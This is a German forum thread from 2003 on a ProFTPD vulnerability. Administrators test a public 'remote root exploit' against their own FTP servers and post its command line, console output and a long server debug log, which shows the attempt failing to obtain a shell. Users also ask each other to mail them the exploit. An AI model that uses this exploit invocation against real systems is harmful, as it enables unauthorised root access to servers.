|
Titel: Sicherheitslücke Beitrag von: Shine am 09. Oktober 2003, 22:22:26 hi,
ich hab die 1.2.8er und hab den exploit getestet ... als meldung kommt Zitat
werde mir gleich noch die neue version ziehen .. Titel: Re: Sicherheitslücke Beitrag von: stonki am 10. Oktober 2003, 11:25:36 Zitat von: "Shine" hi, bedeutet das, dass der exploid net zieht? werde mir gleich noch die neue version ziehen .. cool. Keine Ahnung, kannste mir den Exploit mal mailen ? cu stonki Titel: Sicherheitslücke Beitrag von: Wörsty am 10. Oktober 2003, 13:11:19 :dito) Auch habenwilll - muß ich nicht selbst suchen :roll:
Titel: Sicherheitslücke Beitrag von: Wörsty am 10. Oktober 2003, 15:02:27 Bei mir geht des auch nicht.
Exploit: Code: [root@knowledgebase root]# ./exploit -d kb.de.nx1 -u ftpadmin -p passwort -l 10.138.131.75 -t 1 @---------------------------------------------------------@ # proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-1.20 # @ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @ ----------------------------------------------------------- [+] Ret address:0xbffff25c [+] Trying kb.de.nx1:21....ok [+] Get banner:ok <== 220-Willkommen! 220---------------------------------------- 220-standalone FTP daemon [667], up for 4 hrs 09 min 220-26615 anonymous [ 0m10s] 0m10s idle 220- client: 10.248.5.77 [10.248.5.77] 220- server: 10.138.131.75:21 (NetxiraOne - FTP-Server) 220- location: / 220- 220-26631 anonymous [ 0m3s] 0m3s idle 220- client: 10.248.5.77 [10.248.5.77] 220- server: 10.138.131.75:21 (NetxiraOne - FTP-Server) 220- location: / 220- 220-Service class - 2 users 220---------------------------------------- [+] User ftpadmin logged in [+] PORT 10,138,131,75,135,8 [+] STOR file 126841268412684.txt [+] Listening on 34568 ....ok [+] Accepted a client from 10.138.131.75 [+] Trying kb.de.nx1:21....ok [+] Get banner:ok <== 220-Willkommen! 220---------------------------------------- 220-standalone FTP daemon [667], up for 4 hrs 09 min 220-26615 anonymous [ 0m10s] 0m10s idle 220- client: 10.248.5.77 [10.248.5.77] 220- server: 10.138.131.75:21 (NetxiraOne - FTP-Server) 220- location: / 220- 220-26631 anonymous [ 0m3s] 0m3s idle 220- client: 10.248.5.77 [10.248.5.77] 220- server: 10.138.131.75:21 (NetxiraOne - FTP-Server) 220- location: / 220- 220-Service class - 2 users 220---------------------------------------- [+] User ftpadmin logged in [+] PORT 10,138,131,75,135,8 [+] RETR file 126841268412684.txt [+] Listening on 34568 ....ok [+] Accepted a client from 10.138.131.75 [+] The First time read:ok [+] PORT 10,138,131,75,135,9 [+] RETR file 126841268412684.txt [+] Listening on 34569 ....ok [+] Accepted a client from 10.138.131.75 [+] Waiting for a shell..... [+] Trying kb.de.nx1:6000....error:Connection refused Debug: Code: [root@knowledgebase proftpd-1.2.9rc2]# proftpd -nd9 - parsing '/www/conf//proftpd.conf' configuration - FS: using system open() - FS: using system read() - dispatching auth request "getpwnam" to module mod_sql - dispatching auth request "getpwnam" to module mod_auth_file - dispatching auth request "getpwnam" to module mod_auth_unix - dispatching auth request "getgrnam" to module mod_sql - dispatching auth request "getgrnam" to module mod_auth_file - dispatching auth request "getgrnam" to module mod_auth_unix - FS: using system read() - Compiling allow regex '^[a-zA-Z0-9]*'. - Allocated allow regex at location 0x80e3018. - parsing '/www/conf/proftpd_ext_anon.conf' configuration - FS: using system open() - FS: using system read() - FS: using system close() - Compiling deny regex '(\.ftpaccess)|(\.htaccess)|(\.welcome.msg)|(\.dirinfo.msg)|(\.login.msg)'. - Allocated deny regex at location 0x80e3320. - FS: using system read() - <Directory ~>: adding section for resolved path '~' - FS: using system read() - <Directory ~/uploads>: adding section for resolved path '~/uploads' - Compiling allow regex '^[a-zA-Z0-9]*'. - Allocated allow regex at location 0x80e34d8. - FS: using system read() - Compiling deny regex '(\.ftpaccess)|(\.htaccess)|(\.DisplayConnect.msg)|(\.DisplayFirstChdir.msg)|(\.DisplayGoAway.msg)|(\.DisplayLogin.msg)|(\.DisplayGoAway.msg)|(\.DisplayQuit.msg)'. - Allocated deny regex at location 0x80f3de8. - FS: using system read() - FS: using system read() - FS: using system read() - FS: using system read() - FS: using system read() - FS: using system close() ber06075 - ber06075 - Config for NetxiraOne - FTP-Server: ber06075 - <IfGroup> ber06075 - ~/uploads ber06075 - Limit ber06075 - AllowAll ber06075 - DenyAll ber06075 - Limit ber06075 - DenyAll ber06075 - ~ ber06075 - Limit ber06075 - IgnoreHidden ber06075 - AllowAll ber06075 - Limit ber06075 - DenyAll ber06075 - IfGroupList ber06075 - RootLogin ber06075 - AllowLogSymlinks ber06075 - RequireValidShell ber06075 - tcpNoDelay ber06075 - PidFile ber06075 - UserID ber06075 - UserName ber06075 - GroupID ber06075 - GroupName ber06075 - AccessDenyMsg ber06075 - AccessGrantMsg ber06075 - AllowFilter ber06075 - AllowForeignAddress ber06075 - AllowOverwrite ber06075 - AllowRetrieveRestart ber06075 - AllowStoreRestart ber06075 - AuthAliasOnly ber06075 - DeleteAbortedStores ber06075 - DirFakeGroup ber06075 - DirFakeMode ber06075 - DirFakeUser ber06075 - DisplayConnect ber06075 - DisplayFirstChdir ber06075 - DisplayGoAway ber06075 - DisplayQuit ber06075 - ExtendedLog ber06075 - HiddenStores ber06075 - IdentLookups ber06075 - LoginPasswordPrompt ber06075 - MaxClients ber06075 - MaxClientsPerHost ber06075 - MaxHostsPerUser ber06075 - MaxLoginAttempts ber06075 - PathDenyFilter ber06075 - RequireValidShell ber06075 - ServerIdent ber06075 - ShowSymlinks ber06075 - SyslogLevel ber06075 - Umask ber06075 - DirUmask ber06075 - SQLAuthenticate ber06075 - SQLAuthTypes ber06075 - SQLConnectInfo ber06075 - SQLDefaultGID ber06075 - SQLDefaultUID ber06075 - SQLHomedirOnDemand ber06075 - SQLUserTable ber06075 - SQLUsernameField ber06075 - SQLPasswordField ber06075 - SQLHomedirField ber06075 - SQLGroupTable ber06075 - SQLGroupnameField ber06075 - SQLGroupGIDField ber06075 - SQLGroupMembersField ber06075 - TimeoutIdle ber06075 - TimeoutLogin ber06075 - TimeoutNoTransfer ber06075 - TimeoutStalled ber06075 - TimesGMT ber06075 - Classes ber06075 - DefaultChdir ber06075 - DefaultRoot ber06075 - DefaultTransferMode ber06075 - DeferWelcome ber06075 - PassivePorts ber06075 - UseGlobbing ber06075 - UseFtpUsers ber06075 - 10.138.131.75:121 masquerading as 10.138.131.75 ber06075 - ber06075 - Config for Knowledgebase - Warteschlange: ber06075 - AccessDenyMsg ber06075 - AccessGrantMsg ber06075 - AllowFilter ber06075 - AllowForeignAddress ber06075 - AllowOverwrite ber06075 - AllowRetrieveRestart ber06075 - AllowStoreRestart ber06075 - AuthAliasOnly ber06075 - DeleteAbortedStores ber06075 - DirFakeGroup ber06075 - DirFakeMode ber06075 - DirFakeUser ber06075 - DisplayConnect ber06075 - DisplayFirstChdir ber06075 - DisplayGoAway ber06075 - DisplayLogin ber06075 - DisplayQuit ber06075 - ExtendedLog ber06075 - HiddenStores ber06075 - IdentLookups ber06075 - MaxClients ber06075 - MaxClientsPerHost ber06075 - MaxHostsPerUser ber06075 - LoginPasswordPrompt ber06075 - MasqueradeAddress ber06075 - MaxLoginAttempts ber06075 - PathDenyFilter ber06075 - RequireValidShell ber06075 - ServerIdent ber06075 - ShowSymlinks ber06075 - SyslogLevel ber06075 - SQLAuthenticate ber06075 - SQLAuthTypes ber06075 - SQLConnectInfo ber06075 - SQLDefaultGID ber06075 - SQLDefaultUID ber06075 - SQLHomedirOnDemand ber06075 - SQLLog_PASS ber06075 - SQLLog_PASS ber06075 - SQLLog_DELE ber06075 - SQLLog_RETR ber06075 - SQLLog_* ber06075 - SQLLog_ERR_* ber06075 - SQLNamedQuery_updatecount ber06075 - SQLNamedQuery_letzter_zugriff ber06075 - SQLNamedQuery_delfile ber06075 - SQLNamedQuery_getfile ber06075 - SQLNamedQuery_history ber06075 - SQLNamedQuery_history_err ber06075 - SQLUserTable ber06075 - SQLUsernameField ber06075 - SQLPasswordField ber06075 - SQLUidField ber06075 - SQLHomedirField ber06075 - TimesGMT ber06075 - Umask ber06075 - DirUmask ber06075 - Classes ber06075 - DefaultChdir ber06075 - DefaultRoot ber06075 - DefaultTransferMode ber06075 - DeferWelcome ber06075 - PassivePorts ber06075 - UseGlobbing ber06075 - UseFtpUsers ber06075 - dispatching auth request "getgroups" to module mod_sql ber06075 - dispatching auth request "getgroups" to module mod_auth_file ber06075 - dispatching auth request "getgroups" to module mod_auth_unix ber06075 - SETUP PRIVS at main.c:2711 ber06075 - ROOT PRIVS at main.c:1953 ber06075 - RELINQUISH PRIVS at main.c:1959 ber06075 - ROOT PRIVS at main.c:2320 ber06075 - opening scoreboard '/usr/local/var/proftpd/proftpd.scoreboard' ber06075 - RELINQUISH PRIVS at main.c:2344 ber06075 - ROOT PRIVS at inet.c:452 ber06075 - RELINQUISH PRIVS at inet.c:510 ber06075 - ROOT PRIVS at inet.c:452 ber06075 - RELINQUISH PRIVS at inet.c:510 ber06075 - ProFTPD 1.2.9rc2 (devel) (built Fre Okt 10 14:55:34 CEST 2003) standalone mode STARTUP ber06075 - ROOT PRIVS at main.c:2168 ber06075 - RELINQUISH PRIVS at main.c:2174 ber06075 - FS: using system lstat() ber06075 - FS: using system lstat() ber06075 - ROOT PRIVS at main.c:1145 ber06075 - RELINQUISH PRIVS at main.c:1149 ber06075 (10.138.131.75[10.138.131.75]) - ident lookup disabled ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at main.c:972 ber06075 (10.138.131.75[10.138.131.75]) - SETUP PRIVS at main.c:977 ber06075 (10.138.131.75[10.138.131.75]) - FTP session requested from unknown class ber06075 (10.138.131.75[10.138.131.75]) - performing module session initializations ber06075 (10.138.131.75[10.138.131.75]) - mod_log: opening ExtendedLog '/www/vhosts/administration/linux/logfiles/proftpd_anonftp.log' ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_log.c:1131 ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_log.c:1133 ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:130 ber06075 (10.138.131.75[10.138.131.75]) - opening scoreboard '/usr/local/var/proftpd/proftpd.scoreboard' ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:150 ber06075 (10.138.131.75[10.138.131.75]) - connected - local : 10.138.131.75:21 ber06075 (10.138.131.75[10.138.131.75]) - connected - remote : 10.138.131.75:51402 ber06075 (10.138.131.75[10.138.131.75]) - FS: using system open() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system close() ber06075 (10.138.131.75[10.138.131.75]) - FTP session opened. ber06075 - FS: using system lstat() ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'USER ftpadmin' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'USER ftpadmin' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'USER ftpadmin' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'USER ftpadmin' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getgroups" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'USER ftpadmin' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'USER ftpadmin' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'USER ftpadmin' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PASS (hidden)' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PASS (hidden)' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getgroups" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwnam" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "gid_name" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "auth" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "check" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "setgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - USER PRIVS 502 at mod_auth.c:1099 ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:1101 ber06075 (10.138.131.75[10.138.131.75]) - ber06075 (10.138.131.75[10.138.131.75]) - Config for NetxiraOne - FTP-Server: ber06075 (10.138.131.75[10.138.131.75]) - <IfGroup> ber06075 (10.138.131.75[10.138.131.75]) - ~/uploads ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - AllowAll ber06075 (10.138.131.75[10.138.131.75]) - DenyAll ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - DenyAll ber06075 (10.138.131.75[10.138.131.75]) - ~ ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - IgnoreHidden ber06075 (10.138.131.75[10.138.131.75]) - AllowAll ber06075 (10.138.131.75[10.138.131.75]) - Limit ber06075 (10.138.131.75[10.138.131.75]) - DenyAll ber06075 (10.138.131.75[10.138.131.75]) - IfGroupList ber06075 (10.138.131.75[10.138.131.75]) - RootLogin ber06075 (10.138.131.75[10.138.131.75]) - AllowLogSymlinks ber06075 (10.138.131.75[10.138.131.75]) - RequireValidShell ber06075 (10.138.131.75[10.138.131.75]) - tcpNoDelay ber06075 (10.138.131.75[10.138.131.75]) - PidFile ber06075 (10.138.131.75[10.138.131.75]) - UserID ber06075 (10.138.131.75[10.138.131.75]) - UserName ber06075 (10.138.131.75[10.138.131.75]) - GroupID ber06075 (10.138.131.75[10.138.131.75]) - GroupName ber06075 (10.138.131.75[10.138.131.75]) - AccessDenyMsg ber06075 (10.138.131.75[10.138.131.75]) - AccessGrantMsg ber06075 (10.138.131.75[10.138.131.75]) - AllowFilter ber06075 (10.138.131.75[10.138.131.75]) - AllowForeignAddress ber06075 (10.138.131.75[10.138.131.75]) - AllowOverwrite ber06075 (10.138.131.75[10.138.131.75]) - AllowRetrieveRestart ber06075 (10.138.131.75[10.138.131.75]) - AllowStoreRestart ber06075 (10.138.131.75[10.138.131.75]) - AuthAliasOnly ber06075 (10.138.131.75[10.138.131.75]) - DeleteAbortedStores ber06075 (10.138.131.75[10.138.131.75]) - DirFakeGroup ber06075 (10.138.131.75[10.138.131.75]) - DirFakeMode ber06075 (10.138.131.75[10.138.131.75]) - DirFakeUser ber06075 (10.138.131.75[10.138.131.75]) - DisplayConnect ber06075 (10.138.131.75[10.138.131.75]) - DisplayFirstChdir ber06075 (10.138.131.75[10.138.131.75]) - DisplayGoAway ber06075 (10.138.131.75[10.138.131.75]) - DisplayQuit ber06075 (10.138.131.75[10.138.131.75]) - ExtendedLog ber06075 (10.138.131.75[10.138.131.75]) - HiddenStores ber06075 (10.138.131.75[10.138.131.75]) - IdentLookups ber06075 (10.138.131.75[10.138.131.75]) - LoginPasswordPrompt ber06075 (10.138.131.75[10.138.131.75]) - MaxClients ber06075 (10.138.131.75[10.138.131.75]) - MaxClientsPerHost ber06075 (10.138.131.75[10.138.131.75]) - MaxHostsPerUser ber06075 (10.138.131.75[10.138.131.75]) - MaxLoginAttempts ber06075 (10.138.131.75[10.138.131.75]) - PathDenyFilter ber06075 (10.138.131.75[10.138.131.75]) - RequireValidShell ber06075 (10.138.131.75[10.138.131.75]) - ServerIdent ber06075 (10.138.131.75[10.138.131.75]) - ShowSymlinks ber06075 (10.138.131.75[10.138.131.75]) - SyslogLevel ber06075 (10.138.131.75[10.138.131.75]) - Umask ber06075 (10.138.131.75[10.138.131.75]) - DirUmask ber06075 (10.138.131.75[10.138.131.75]) - SQLAuthenticate ber06075 (10.138.131.75[10.138.131.75]) - SQLAuthTypes ber06075 (10.138.131.75[10.138.131.75]) - SQLConnectInfo ber06075 (10.138.131.75[10.138.131.75]) - SQLDefaultGID ber06075 (10.138.131.75[10.138.131.75]) - SQLDefaultUID ber06075 (10.138.131.75[10.138.131.75]) - SQLHomedirOnDemand ber06075 (10.138.131.75[10.138.131.75]) - SQLUserTable ber06075 (10.138.131.75[10.138.131.75]) - SQLUsernameField ber06075 (10.138.131.75[10.138.131.75]) - SQLPasswordField ber06075 (10.138.131.75[10.138.131.75]) - SQLHomedirField ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupTable ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupnameField ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupGIDField ber06075 (10.138.131.75[10.138.131.75]) - SQLGroupMembersField ber06075 (10.138.131.75[10.138.131.75]) - TimeoutIdle ber06075 (10.138.131.75[10.138.131.75]) - TimeoutLogin ber06075 (10.138.131.75[10.138.131.75]) - TimeoutNoTransfer ber06075 (10.138.131.75[10.138.131.75]) - TimeoutStalled ber06075 (10.138.131.75[10.138.131.75]) - TimesGMT ber06075 (10.138.131.75[10.138.131.75]) - Classes ber06075 (10.138.131.75[10.138.131.75]) - DefaultChdir ber06075 (10.138.131.75[10.138.131.75]) - DefaultRoot ber06075 (10.138.131.75[10.138.131.75]) - DefaultTransferMode ber06075 (10.138.131.75[10.138.131.75]) - DeferWelcome ber06075 (10.138.131.75[10.138.131.75]) - PassivePorts ber06075 (10.138.131.75[10.138.131.75]) - UseGlobbing ber06075 (10.138.131.75[10.138.131.75]) - UseFtpUsers ber06075 (10.138.131.75[10.138.131.75]) - CURRENT-CLIENTS ber06075 (10.138.131.75[10.138.131.75]) - USER ber06075 (10.138.131.75[10.138.131.75]) - USER ftpadmin: Login successful. ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:1170 ber06075 (10.138.131.75[10.138.131.75]) - opening TransferLog '/var/log/xferlog' ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:1199 ber06075 (10.138.131.75[10.138.131.75]) - USER PRIVS 502 at mod_auth.c:697 ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwnam" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:701 ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "setpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "setgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - Preparing to chroot() the environment, path = '/www/vhosts/ftp' ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:62 ber06075 (10.138.131.75[10.138.131.75]) - FS: using system chroot() ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:69 ber06075 (10.138.131.75[10.138.131.75]) - Environment successfully chroot()ed. ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:1242 ber06075 (10.138.131.75[10.138.131.75]) - SETUP PRIVS at mod_auth.c:1249 ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "getpwnam" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - unable to chdir to ~/ (No such file or directory), defaulting to chroot directory /www/vhosts/ftp ber06075 (10.138.131.75[10.138.131.75]) - FS: using system chdir() ber06075 (10.138.131.75[10.138.131.75]) - in dir_check_full(): path = '/', fullpath = '/www/vhosts/ftp/'. ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_cap ber06075 (10.138.131.75[10.138.131.75]) - mod_cap/1.0: capabilities '= cap_chown,cap_net_bind_service+ep' ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_ifsession ber06075 (10.138.131.75[10.138.131.75]) - mod_ifsession/0.9: <IfGroup> not matched, skipping ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_ls ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PASS (hidden)' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PASS (hidden)' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PASS (hidden)' to mod_auth ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PORT 10,138,131,75,135,8' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'PORT 10,138,131,75,135,8' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'PORT 10,138,131,75,135,8' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'PORT 10,138,131,75,135,8' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PORT 10,138,131,75,135,8' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'PORT 10,138,131,75,135,8' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'TYPE A' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'TYPE A' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'TYPE A' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'TYPE A' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'TYPE A' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'TYPE A' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'STOR 126841268412684.txt' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'STOR 126841268412684.txt' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'STOR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - in dir_check_full(): path = '/126841268412684.txt', fullpath = '/www/vhosts/ftp/126841268412684.txt'. ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system stat() ber06075 (10.138.131.75[10.138.131.75]) - in dir_check_full(): setting umask to 0111 (was 0111) ber06075 (10.138.131.75[10.138.131.75]) - FS: using system lstat() ber06075 (10.138.131.75[10.138.131.75]) - dispatching CMD command 'STOR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - '126841268412684.txt' allowed by PathDenyFilter (No match) ber06075 (10.138.131.75[10.138.131.75]) - FS: using system open() ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS: ID switching disabled ber06075 (10.138.131.75[10.138.131.75]) - active data connection opened - local : 10.138.131.75:20 ber06075 (10.138.131.75[10.138.131.75]) - active data connection opened - remote : 10.138.131.75:34568 ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system write() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system close() ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'STOR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching POST_CMD command 'STOR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'STOR 126841268412684.txt' to mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'STOR 126841268412684.txt' to mod_log ber06075 (10.138.131.75[10.138.131.75]) - dispatching LOG_CMD command 'STOR 126841268412684.txt' to mod_xfer ber06075 (10.138.131.75[10.138.131.75]) - Transfer completed: 41984 bytes in 0.00 seconds ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endpwent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - dispatching auth request "endgrent" to module mod_sql ber06075 (10.138.131.75[10.138.131.75]) - FTP session closed. ber06075 - FS: using system lstat() ber06075 - ROOT PRIVS at main.c:1145 ber06075 - RELINQUISH PRIVS at main.c:1149 ber06075 (10.138.131.75[10.138.131.75]) - ident lookup disabled ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at main.c:972 ber06075 (10.138.131.75[10.138.131.75]) - SETUP PRIVS at main.c:977 ber06075 (10.138.131.75[10.138.131.75]) - FTP session requested from unknown class ber06075 (10.138.131.75[10.138.131.75]) - performing module session initializations ber06075 - FS: using system lstat() ber06075 (10.138.131.75[10.138.131.75]) - mod_log: opening ExtendedLog '/www/vhosts/administration/linux/logfiles/proftpd_anonftp.log' ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_log.c:1131 ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_log.c:1133 ber06075 (10.138.131.75[10.138.131.75]) - ROOT PRIVS at mod_auth.c:130 ber06075 (10.138.131.75[10.138.131.75]) - opening scoreboard '/usr/local/var/proftpd/proftpd.scoreboard' ber06075 (10.138.131.75[10.138.131.75]) - RELINQUISH PRIVS at mod_auth.c:150 ber06075 (10.138.131.75[10.138.131.75]) - connected - local : 10.138.131.75:21 ber06075 (10.138.131.75[10.138.131.75]) - connected - remote : 10.138.131.75:51403 ber06075 (10.138.131.75[10.138.131.75]) - FS: using system open() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system read() ber06075 (10.138.131.75[10.138.131.75]) - FS: using system close() ber06075 (10.138.131.75[10.138.131.75]) - FTP session opened. ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'USER ftpadmin' to mod_core ber06075 (10.138.131.75[10.138.131.75]) - dispatching PRE_CMD command 'USER ftpadmin' to mod_core ber06075 